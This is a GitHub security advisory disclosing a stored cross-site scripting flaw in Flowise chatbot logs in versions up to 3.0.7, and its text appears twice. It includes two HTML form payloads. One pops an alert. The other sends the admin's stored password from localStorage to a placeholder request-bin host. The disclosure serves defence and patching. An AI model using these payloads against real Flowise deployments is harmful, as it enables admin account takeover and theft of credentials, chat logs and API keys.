Headline
GHSA-7r4h-vmj9-wg42: Flowise Stored XSS vulnerability through logs in chatbot
Description
In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin’s credentials or sensitive information with stored Cross Site Scripting.
PoC
<form>
<input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" />
</form>
If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot.
<form>
<input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" />
</form>
So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker’s IP. If attacker steal admin’s token, attacker can login as the admin in the apps.
Poc Video
Impact
An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.
- GitHub Advisory Database
- GitHub Reviewed
- GHSA-7r4h-vmj9-wg42
Flowise Stored XSS vulnerability through logs in chatbot
Moderate severity GitHub Reviewed Published Oct 3, 2025 in FlowiseAI/Flowise
Package
npm flowise (npm)
Affected versions
<= 3.0.7
Description
In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin’s credentials or sensitive information with stored Cross Site Scripting.
PoC
<form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert(‘XSS!!!’);" /> </form>
If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot.
<form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href=’<YOUR_REQUESTBIN_SERVER>?passwd=’ + encodeURIComponent(localStorage.getItem(‘password’));" /> </form>
So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker’s IP. If attacker steal admin’s token, attacker can login as the admin in the apps.
Poc Video
poc
Impact
An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.
References
- GHSA-7r4h-vmj9-wg42
Published to the GitHub Advisory Database
Oct 3, 2025